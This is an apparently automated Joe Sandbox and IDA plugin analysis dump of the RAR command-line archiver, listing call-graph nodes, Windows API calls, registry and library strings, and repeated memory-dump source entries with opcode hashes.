39730->39733 39731->39730 39732 7ff623dd7f89 39733->39732 39756 7ff623df6378 39733->39756 39735 7ff623dd7cd7 39736 7ff623df6378 4 API calls 39735->39736 39738 7ff623dd7cf3 39736->39738 39737 7ff623dd7de1 39744 7ff623dd7e4e 39737->39744 39761 7ff623e098dc 39737->39761 39738->39737 39740 7ff623dd7d38 39738->39740 39741 7ff623dd7d59 39738->39741 39742 7ff623e2a444 new 4 API calls 39740->39742 39743 7ff623e2a444 new 4 API calls 39741->39743 39748 7ff623dd7d42 std::bad_alloc::bad_alloc 39742->39748 39743->39748 39767 7ff623dd1204 48 API calls 39744->39767 39746 7ff623dd7eb3 39749 7ff623dd7edb 39746->39749 39768 7ff623e09680 39746->39768 39748->39737 39760 7ff623e2ba34 RtlPcToFileHeader RaiseException 39748->39760 39774 7ff623df6424 8 API calls _handle_error 39749->39774 39751 7ff623dd7f56 39753 7ff623ddb540 147 API calls 39751->39753 39753->39732 39754->39724 39755->39731 39757 7ff623df6396 39756->39757 39759 7ff623df63a0 39756->39759 39758 7ff623e2a444 new 4 API calls 39757->39758 39758->39759 39759->39735 39760->39737 39762 7ff623e09926 39761->39762 39763 7ff623e0993c 39761->39763 39764 7ff623de90b8 75 API calls 39762->39764 39765 7ff623de90b8 75 API calls 39763->39765 39766 7ff623e09934 39764->39766 39765->39766 39766->39744 39767->39746 39772 7ff623e096a4 39768->39772 39769 7ff623e097d7 39770 7ff623df2574 126 API calls 39770->39772 39772->39769 39772->39770 39773 7ff623e29b98 216 API calls 39772->39773 39775 7ff623df6498 72 API calls new 39772->39775 39773->39772 39774->39751 39775->39772 39776 7ff623e1bb70 39779 7ff623e1bb80 39776->39779 39788 7ff623e1bae8 39779->39788 39781 7ff623e1bb97 39782 7ff623e1bb79 39781->39782 39793 7ff623de1690 39781->39793 39784 7ff623e1bbc8 SetEvent 39785 7ff623e1bbd5 LeaveCriticalSection 39784->39785 39786 7ff623e1bae8 67 API calls 39785->39786 39786->39781 39797 7ff623e1b974 WaitForSingleObject 39788->39797 39791 7ff623e1bb16 EnterCriticalSection LeaveCriticalSection 39792 7ff623e1bb12 39791->39792 39792->39781 39794 7ff623de16c2 EnterCriticalSection 39793->39794 39795 7ff623de16a4 39793->39795 39794->39784 39794->39785 39795->39794 39805 7ff623de1180 39795->39805 39798 7ff623e1b9b7 39797->39798 39799 7ff623e1b986 GetLastError 39797->39799 39798->39791 39798->39792 39803 7ff623deca6c 48 API calls 3 library calls 39799->39803 39801 7ff623e1b9a6 39804 7ff623deca40 61 API calls _CxxThrowException 39801->39804 39803->39801 39804->39798 39806 7ff623de11ab 39805->39806 39811 7ff623de11b0 39805->39811 39815 7ff623de17c8 216 API calls 2 library calls 39806->39815 39808 7ff623de166a 39808->39795 39809 7ff623e06fe8 216 API calls 39809->39811 39810 7ff623e06e90 216 API calls 39810->39811 39811->39808 39811->39809 39811->39810 39812 7ff623e06d38 216 API calls 39811->39812 39813 7ff623de1080 48 API calls 39811->39813 39816 7ff623de17c8 216 API calls 2 library calls 39811->39816 39812->39811 39813->39811 39815->39811 39816->39811 39817 7ff623e39c74 39819 7ff623e39c7c 39817->39819 39818 7ff623e39cbb 39821 7ff623e39cc5 39818->39821 39839 7ff623e3ce08 32 API calls 2 library calls 39818->39839 39819->39818 39820 7ff623e39cac 39819->39820 39838 7ff623e34f3c 15 API calls _set_errno_from_matherr 39820->39838 39826 7ff623e34b8c 39821->39826 39825 7ff623e39cb1 __scrt_fastfail 39827 7ff623e34bab 39826->39827 39828 7ff623e34ba1 39826->39828 39830 7ff623e34bb0 39827->39830 39836 7ff623e34bb7 __vcrt_getptd_noexit 39827->39836 39829 7ff623e34ab4 setbuf 16 API calls 39828->39829 39834 7ff623e34ba9 39829->39834 39831 7ff623e34a74 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 39830->39831 39831->39834 39832 7ff623e34bf6 39840 7ff623e34f3c 15 API calls _set_errno_from_matherr 39832->39840 39834->39825 39835 7ff623e34be0 RtlReAllocateHeap 39835->39834 39835->39836 39836->39832 39836->39835 39837 7ff623e336c0 new 2 API calls 39836->39837 39837->39836 39838->39825 39839->39821 39840->39834 39841 7ff623e1a924 39842 7ff623e1a949 sprintf 39841->39842 39843 7ff623e1a97f CompareStringA 39842->39843
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                                                                                                                • API String ID: 0-1628410872
                                                                                                                                                                                                                                                                • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                                                • Instruction ID: e25bc916542cdb153589367977d5dfacecc582e23138fd62ba3d520b544c70ae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0CC20676E0C38281EE649FA48C471BDAE51BF01794F584AB5CA4EE72C6DF6DE904C312
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                                                                • API String ID: 0-1660254149
                                                                                                                                                                                                                                                                • Opcode ID: 5356308a5213ef53ebe9158b3a8dbaf6b722f78413d02868b50865a4794f0cd4
                                                                                                                                                                                                                                                                • Instruction ID: 97a01183c98457fd66dd6984e261acc40bba13b8860acd280baa6cd452abfea3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5356308a5213ef53ebe9158b3a8dbaf6b722f78413d02868b50865a4794f0cd4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1EE2EF23A08ACA85EF20DB65CC422FD37A1FB49788F4506B2DA4DA7796DF38D545C702

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF623E14AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF623DECC90), ref: 00007FF623E14AF5
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,00007FF623E07E7D), ref: 00007FF623E1492E
                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?,?,?,00007FF623E07E7D), ref: 00007FF623E1496A
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(?,?,?,00007FF623E07E7D), ref: 00007FF623E14993
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,00007FF623E07E7D), ref: 00007FF623E1499F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                                                                • String ID: rarlng.dll
                                                                                                                                                                                                                                                                • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                                                                • Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                                                • Instruction ID: de1ba77603c06ddf3d3b7105cdcb8043bdf5d6179490a5ebc61631169e14ed8b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A312031B1864285FF649B21EC422E96764FF45784F804076EACDA2B95DF3DE98DCB01

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF623E038CB,?,?,?,00007FF623E041EC), ref: 00007FF623E043D1
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF623E038CB,?,?,?,00007FF623E041EC), ref: 00007FF623E04402
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF623E038CB,?,?,?,00007FF623E041EC), ref: 00007FF623E0440D
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF623E038CB,?,?,?,00007FF623E041EC), ref: 00007FF623E0443E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                                                                                                                • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                                                                                                                • API String ID: 3617018055-3415417297
                                                                                                                                                                                                                                                                • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                                                • Instruction ID: c19fcdaddc76ef4fc09e56eaba58923e94d6caad96b568e2276a7a1a86bcfb6a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE116022A1874686EF119F26B9025A9B360FF88BC4F445172EE8E67795DF3DD408CB02
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF623E33CEF,?,?,00000000,00007FF623E33CAA,?,?,00000000,00007FF623E33FD9), ref: 00007FF623E397A5
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF623E33CEF,?,?,00000000,00007FF623E33CAA,?,?,00000000,00007FF623E33FD9), ref: 00007FF623E39807
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF623E33CEF,?,?,00000000,00007FF623E33CAA,?,?,00000000,00007FF623E33FD9), ref: 00007FF623E39841
                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF623E33CEF,?,?,00000000,00007FF623E33CAA,?,?,00000000,00007FF623E33FD9), ref: 00007FF623E3986B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1557788787-0
                                                                                                                                                                                                                                                                • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                                                • Instruction ID: e64f12bc8089e77ebc668fb8db523ca5bf93f675e97e3edfaf0bfcd25733608d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B218221F0875181EA208F12A8411B9A6B4FF98BD0F084176EECEB3BE4DF3CD4568705
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                                                • Instruction ID: f236cd7310daf1204cfd2be51a67eb7861e9d6d63a72fd558d014e7b1ddbe36e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56E01A20A1875542EE44AB309C823B923526F88B41F0054BACDCEA23A3CF3DA80C8252
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 932687459-0
                                                                                                                                                                                                                                                                • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                                                • Instruction ID: 8fe1fc841b260915b19b57cf57a1cd03400f26381dcd394c841c52569e884f4d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56218457A08E8582DB01CF69D5410B87360FB98B88B18A721DF8D53656EF38E5E58700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 9e472e9346ac97a6ded21e421b0779c28132cfcd090790d4bc75d31863e080f4
                                                                                                                                                                                                                                                                • Instruction ID: dd16ba4b84014eff5510a0f5a18f5170fb50f3ff3e6bebe1c0e16f1700bcb8d7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e472e9346ac97a6ded21e421b0779c28132cfcd090790d4bc75d31863e080f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0111B931509B8242EE00DB64ED423A9B2A4EF94790F240775EADD577EADF3CD055C305
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
